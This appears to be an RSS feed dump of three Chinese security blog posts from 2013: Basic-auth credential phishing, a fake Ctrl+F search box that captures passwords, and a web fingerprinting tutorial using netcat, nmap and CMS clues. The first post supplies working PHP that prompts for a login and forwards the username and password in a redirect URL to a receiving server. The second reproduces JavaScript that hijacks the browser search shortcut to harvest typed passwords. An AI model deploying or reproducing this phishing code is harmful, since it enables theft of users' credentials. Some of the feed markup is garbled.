DiS9 TeAm http://newdis9.sinaapp.com 探索这一切... Fri, 17 May 2013 12:00:37 +0000 zh-CN hourly 1 http://wordpress.org/?v=3.4.1 基础认证钓鱼攻击与防范 http://newdis9.sinaapp.com/2013/31.html http://newdis9.sinaapp.com/2013/31.html#comments Fri, 17 May 2013 11:28:21 +0000 Dis9 TeAm http://newdis9.sinaapp.com/?p=31 基础认证钓鱼攻击与防范

Joe Lynch

  • 前言

这几天基础认证钓鱼很火,我们来了解一下!

  • 正文

首先大家回想一下,在访问路由器的时候是不是会弹出这样的一个弹窗让你输入帐号密码登录呢

基础认证钓鱼攻击与防范

没错这就是最近很火的基础认证。

那我们如何用php来实现钓鱼攻击呢。

php手册中有以下代码来演示基础认证登录。


if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="My Realm"');
header('HTTP/1.0 401 Unauthorized');
echo 'Text to send if user hits Cancel button';
exit;
} else {
echo "<p>Hello {$_SERVER['PHP_AUTH_USER']}.</p>";
echo "<p>You entered {$_SERVER['PHP_AUTH_PW']} as your password.</p>";
}

首先定义HTTP头为WWW-Authenticate,然后相应为401 这样就可以构造一个简单的基础认证框。

基本流程,用户访问被污染服务器,服务器返回信息,浏览器访问图片地址,图片服务器返回401响应,http头为WWW-Authenticate …..  ,浏览器弹出基础认证框, 由于Location:被定义为收信地址所以,浏览器跳转并转递信息至收信地址。 攻击完成。

贴出攻击代码吧。

<?php
$info=@$_GET['info'];
if(!isset($_SERVER['PHP_AUTH_USER'])){
header("WWW-Authenticate:BASIC Realm=$info");
header("HTTP/1.0 401 Unauthorized");
exit;
}else{
/*获取用户名,密码进行验证*/
$user=$_SERVER['PHP_AUTH_USER'];
$pwd=$_SERVER['PHP_AUTH_PW'];
extract($_GET,EXTR_SKIP);
if($user&&$pwd){

header("Location:http://www.baidu.com/config/log.php?user=$user&pass=$pwd");
}else{
header("WWW-Authenticate:BASIC Realm=user");
header("HTTP/1.0 401 Unauthorized");
exit;
}
}

?>

防范措施:

由于这种攻击并不是由漏洞造成的所以我们的防范手法只能去确定图片地址是否为有效图片。

我们可以用以下代码来验证图片是否有效!

<?php
$url = 'http://www.baidu.com/img/baidu_sylogo1.gif';
if( @fopen( $url, 'r' ) )
{
echo 'File Exits';
}
else
{
echo 'File Do Not Exits';
}
?>
]]> http://newdis9.sinaapp.com/2013/31.html/feed 0 浏览器搜索框劫持钓鱼 http://newdis9.sinaapp.com/2013/19.html http://newdis9.sinaapp.com/2013/19.html#comments Fri, 17 May 2013 11:17:08 +0000 Dis9 TeAm http://newdis9.sinaapp.com/?p=19 浏览器搜索框劫持钓鱼

浏览器搜索框劫持钓鱼

浏览器搜索框劫持钓鱼

http://h43z.koding.com/blog/leaked.html

如以上网站所显示,当你按下ctrl+f 或win+f  组合键是就会弹出一个搜索框其实这个所说框是黑客所伪造的。

攻击流程:当一名攻击者将一个精心构造的页面发给用户,谎称在这个页面查查你的密码是不是被泄露了。

当用户访问后按组合键呼出伪造的搜索框把自己真实的用户名密码输入进去,黑客完成攻击!

我们来解析一下代码分析工作原理

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>//加载jquery 用于执行特效<script type="text/javascript" src="highlight.js"></script>														//加载代码高亮

<script type="text/javascript">// <![CDATA[
/* nyan nyan */
	passwordlist = $("#passwords");		//定义数组
	counter = 0;

	/* format list */
	list = passwordlist.text().replace(/\r\n|\r|\n/g,"
");
	passwordlist.empty();
	passwordlist.html(list).show();

	$(window).keydown(function(evt){				//劫持按键
		if((evt.which == "70" && (evt.metaKey || evt.ctrlKey))){
			console.log("STRG+F");
			evt.preventDefault();
			$("#searchbox").slideDown(110);
			$('#search').focus();
		}
	});

	$("#search").keyup(function(e){						//记录你写了点啥,顺便高亮显示出来,忽悠你让你以为密码没有泄露
		input = this.value;
		send(input);									//发生密码

		if(this.value == ""){
			$("#searchresult").empty();
			passwordlist.removeHighlight();
		}else{
			passwordlist.removeHighlight().highlight(input);
			count = $('.highlight').length;
			if(count == 0){ /* password is not in the list */
				insert_fake(input);
				count = 1;
			}else{
				$('html,body').animate({scrollTop:$(".highlight").offset().top-300}, 1);
			}
            /* : ( , this sucks */
		    var r1 = Math.round(Math.random() * 138);
    		var r2 = Math.round((Math.random() * count)+138+r1);
			$("#searchresult").text(r1+" of "+ r2);
		}
	});

	function insert_fake(input){
		var pass_array = passwordlist.html().split("
");
		var position = Math.round(Math.random() * (pass_array.length-1));

		passwordlist.empty();

		for(var i=0;i<pass_array.length;i++){
			if(i == position){
				var l = pass_array[position].length;
				var r1 = Math.floor(Math.random()*(l-1));
				var old = pass_array[position].replace(/<(?:.|\n)*?>/gm, '');
				var fakepass = old.slice(0, r1) + input + old.slice(r1);
                /* this, too*/
				passwordlist.append("<a id="+counter+">"+fakepass+"</a>");

				$('html,body').animate({scrollTop:$("#"+counter).offset().top-300}, 1);
			}else{
				passwordlist.append(pass_array[i]);
			}
			if(i < pass_array.length - 1){ 				passwordlist.append(" "); 			} 		} 		passwordlist.removeHighlight().highlight(input);	 		counter++; 	} 	$("#searchbox").click(function(e){  		$("#searchbox").slideUp(110); 		passwordlist.removeHighlight(); 	}); 	function send(pass){				//记录密码 		/* save serverside :D  */ 		console.log("$$$: "+pass);		//这里可以改为你的攻击代码,比如接收密码的php文件! 	}
// ]]></script>




小编:我真心不懂js 只是靠意念注释了这段代码,大家将就看吧。sorry

]]>
			http://newdis9.sinaapp.com/2013/19.html/feed
		0
		
		
		网络指纹识别
		http://newdis9.sinaapp.com/2013/12.html
		http://newdis9.sinaapp.com/2013/12.html#comments
		Fri, 17 May 2013 11:15:21 +0000
		Dis9 TeAm
				
		

		http://newdis9.sinaapp.com/?p=12
		
			






1、前言


在渗透测试中我们的首要任务就是收集信息,那么通过网络指纹识别那是比不缺少的一个环节。下面我们就来介绍几种常见网络识别方法。


2.1 Netcat


如果我们要知道一台服务器是采用什么作为http服务器,那么netcat就是一个不错的选择。


root@bt:~# nc www.91ri.org 80


HEAD / HTTP/1.1


Host:www.91ri.org


我们可以自己构造一个http请求来得知服务器采用的http server .


当然www.91ri.org使用CDN 所以我们得到的server并不是真正的http server.


网络指纹识别


Telnet 也有同样的效果我这里就不介绍了.


小贴士如何判断服务器是否采用CDN?


你可以采取从不同地理位置来ping服务器看是否获取同样的IP地址来判断。


当然这也有可能是DNS智能解析.百度搜索:超级ping


2.2 nmap


Nmap众所周知很强大的一款网络探测软件.


网络指纹识别


3.1如何判断这是采用了那款CMS?


网络指纹识别


我们可以查看源码来分析,比如wordpress我们就可以在<meta name=”generator” 标签处看到他的具体版本号!


网络指纹识别


我们也可以从调用CSS的路径看出他是用的是wordpress.


大家都知道如果没用修改从网站底部可以看到他的系统名称与版本号.


那么如果他删除了底部的信息呢?


网络指纹识别


我们可以从 搜索 功能提交的参数来判断.


如图中站点我们可以百度搜索inurl:/search.asp?m=0&s=0&word=


我们可以发现这个网站采用了新云CMS.


网络指纹识别


网络指纹识别


我们可以从搜索返回提示来确定这个网站肯定是采用新云CMS


3.2 在线工具识别


如sebug就提供了这个功能.


http://sebug.net/node/t-12


4.1 通过工具自动识别


比如我们熟知的whatweb ,httprecon等


网络指纹识别


网络指纹识别


工具的使用我就不介绍了。


5.1 写在最后


我的联系方式:hkhdgj@Hotmail.com


如有疑问与意见请及时与我联系.


感谢hkhdgj的投稿!

]]>
			http://newdis9.sinaapp.com/2013/12.html/feed
		0